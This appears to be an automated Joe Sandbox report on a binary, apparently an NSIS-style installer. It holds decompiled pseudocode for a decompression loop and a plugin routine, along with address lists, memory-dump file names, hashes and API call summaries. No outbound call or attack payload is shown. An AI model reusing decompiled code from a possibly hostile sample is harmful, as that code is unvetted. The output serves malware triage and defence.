                                                            								L126:
                                                            								__eflags = _v104;
                                                            								if(_v104 == 0) {
                                                            									break;
                                                            								}
                                                            								__eax = _v24;
                                                            								__eax = _v24 - _v48;
                                                            								__eflags = __eax - _v120;
                                                            								if(__eax >= _v120) {
                                                            									__eax = __eax + _v120;
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx = _v12;
                                                            								__cl =  *(__edx + __eax);
                                                            								__eax = _v24;
                                                            								_v96 = __cl;
                                                            								 *(__edx + __eax) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t420 = __eax % _v120;
                                                            								__eax = __eax / _v120;
                                                            								__edx = _t420;
                                                            								__eax = _v108;
                                                            								_v108 = _v108 + 1;
                                                            								_v104 = _v104 - 1;
                                                            								_v52 = _v52 - 1;
                                                            								__eflags = _v52;
                                                            								 *_v108 = __cl;
                                                            								_v24 = _t420;
                                                            								if(_v52 > 0) {
                                                            									continue;
                                                            								} else {
                                                            									L83:
                                                            									_v140 = 2;
                                                            									goto L3;
                                                            								}
                                                            							}
                                                            							_v140 = 0x1c;
                                                            							L173:
                                                            							_push(0x22);
                                                            							_pop(_t574);
                                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                                            							return 0;
                                                            					}
                                                            				}
                                                            				L174:
                                                            				_t538 = _t537 | 0xffffffff;
                                                            				return _t538;
                                                            			}










































                                                            0x00406119
                                                            0x00406120
                                                            0x00406126
                                                            0x0040612c
                                                            0x00000000
                                                            0x00406130
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406152
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406167
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b2
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061b7
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061cf
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406226
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622b
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x00406248
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x0040628e
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406936
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x0040696c
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00000000
                                                            0x00406b28
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406994
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00000000
                                                            0x00406345
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x00406328
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x00406690
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x004069a0
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00406b3e
                                                            0x00406b44
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000

                                                            Strings
                                                            • 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000, xrefs: 00406109
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                            • API String ID: 0-2221801228
                                                            • Opcode ID: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                            • Instruction ID: 2ea2e7de70dfcb9b8a6977de9a23dc0afa47d6a26cb5075253e99f3f7356adb1
                                                            • Opcode Fuzzy Hash: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                            • Instruction Fuzzy Hash: 16816771E04228DBDF24CFA8C8447ADBBB1FB44305F11816AD856BB281D778A996DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E100016DA(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				void _v36;
                                                            				struct HINSTANCE__* _t34;
                                                            				intOrPtr _t38;
                                                            				void* _t44;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            				void* _t50;
                                                            				intOrPtr _t53;
                                                            				signed int _t57;
                                                            				signed int _t61;
                                                            				void* _t65;
                                                            				void* _t66;
                                                            				void* _t70;
                                                            				void* _t74;
                                                            
                                                            				_t74 = __esi;
                                                            				_t66 = __edi;
                                                            				_t65 = __edx;
                                                            				 *0x1000405c = _a8;
                                                            				 *0x10004060 = _a16;
                                                            				 *0x10004064 = _a12;
                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573);
                                                            				_push(1);
                                                            				_t34 = E10001A86();
                                                            				_t50 = _t34;
                                                            				if(_t50 == 0) {
                                                            					L28:
                                                            					return _t34;
                                                            				} else {
                                                            					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                            						E100021CE(_t50);
                                                            					}
                                                            					E10002218(_t65, _t50);
                                                            					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                            					if(_t53 == 0xffffffff) {
                                                            						L14:
                                                            						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
                                                            							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                            								_push(_t50);
                                                            								_t34 = E100023D6(_t65);
                                                            							} else {
                                                            								_push(_t74);
                                                            								_push(_t66);
                                                            								_t12 = _t50 + 0x818; // 0x818
                                                            								_t57 = 8;
                                                            								memcpy( &_v36, _t12, _t57 << 2);
                                                            								_t38 = E10001576(_t50);
                                                            								_t15 = _t50 + 0x818; // 0x818
                                                            								_t70 = _t15;
                                                            								_push(_t50);
                                                            								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
                                                            								 *_t70 = 3;
                                                            								E100023D6(_t65);
                                                            								_t61 = 8;
                                                            								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                            							}
                                                            						} else {
                                                            							_push(_t50);
                                                            							E100023D6(_t65);
                                                            							_t34 = GlobalFree(E10001278(E10001576(_t50)));
                                                            						}
                                                            						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                            							_t34 = E1000239C(_t50);
                                                            							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                            								_t34 =  *(_t50 + 0x808);
                                                            								if(_t34 != 0) {
                                                            									_t34 = FreeLibrary(_t34);
                                                            								}
                                                            							}
                                                            							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
                                                            								_t34 = E100014FF( *0x10004058);
                                                            							}
                                                            						}
                                                            						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
                                                            							goto L28;
                                                            						} else {
                                                            							return GlobalFree(_t50);
                                                            						}
                                                            					}
                                                            					_t44 =  *_t50;
                                                            					if(_t44 == 0) {
                                                            						if(_t53 != 1) {
                                                            							goto L14;
                                                            						}
                                                            						E10002ABB(_t50);
                                                            						L12:
                                                            						_t50 = _t44;
                                                            						L13:
                                                            						goto L14;
                                                            					}
                                                            					_t45 = _t44 - 1;
                                                            					if(_t45 == 0) {
                                                            						L8:
                                                            						_t44 = E10002800(_t53, _t50); // executed
                                                            						goto L12;
                                                            					}
                                                            					_t46 = _t45 - 1;
                                                            					if(_t46 == 0) {
                                                            						E100025A2(_t50);
                                                            						goto L13;
                                                            					}
                                                            					if(_t46 != 1) {
                                                            						goto L14;
                                                            					}
                                                            					goto L8;
                                                            				}
                                                            			}

















                                                            0x100016da
                                                            0x100016da
                                                            0x100016da
                                                            0x100016e4
                                                            0x100016ec
                                                            0x100016f9
                                                            0x10001707
                                                            0x1000170a
                                                            0x1000170c
                                                            0x10001711
                                                            0x10001716
                                                            0x10001829
                                                            0x10001829
                                                            0x1000171c
                                                            0x10001720
                                                            0x10001723
                                                            0x10001728
                                                            0x1000172a
                                                            0x10001730
                                                            0x10001736
                                                            0x10001766
                                                            0x1000176d
                                                            0x10001791
                                                            0x100017cf
                                                            0x100017d0
                                                            0x10001793
                                                            0x10001793
                                                            0x10001794
                                                            0x10001797
                                                            0x1000179d
                                                            0x100017a1
                                                            0x100017a4
                                                            0x100017a9
                                                            0x100017a9
                                                            0x100017af
                                                            0x100017b0
                                                            0x100017b6
                                                            0x100017bc
                                                            0x100017c8
                                                            0x100017c9
                                                            0x100017cc
                                                            0x1000176f
                                                            0x1000176f
                                                            0x10001770
                                                            0x10001785
                                                            0x10001785
                                                            0x100017da
                                                            0x100017dd
                                                            0x100017ea
                                                            0x100017f1
                                                            0x100017f9
                                                            0x100017fc
                                                            0x100017fc
                                                            0x100017f9
                                                            0x10001809
                                                            0x10001811
                                                            0x10001816
                                                            0x10001809
                                                            0x1000181e
                                                            0x00000000
                                                            0x10001820
                                                            0x00000000
                                                            0x10001821
                                                            0x1000181e
                                                            0x1000173a
                                                            0x1000173d
                                                            0x1000175b
                                                            0x00000000
                                                            0x00000000
                                                            0x1000175e
                                                            0x10001763
                                                            0x10001763
                                                            0x10001765
                                                            0x00000000
                                                            0x10001765
                                                            0x1000173f
                                                            0x10001740
                                                            0x10001748
                                                            0x10001749
                                                            0x00000000
                                                            0x10001749
                                                            0x10001742
                                                            0x10001743
                                                            0x10001751
                                                            0x00000000
                                                            0x10001751
                                                            0x10001746
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x10001746

                                                            APIs
                                                              • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
                                                              • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
                                                              • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                            • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                              • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
                                                              • Part of subcall function 100025A2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 10002614
                                                              • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,10004010,00000000,100016B2,00000000), ref: 1000158F
                                                              • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243D
                                                              • Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F0
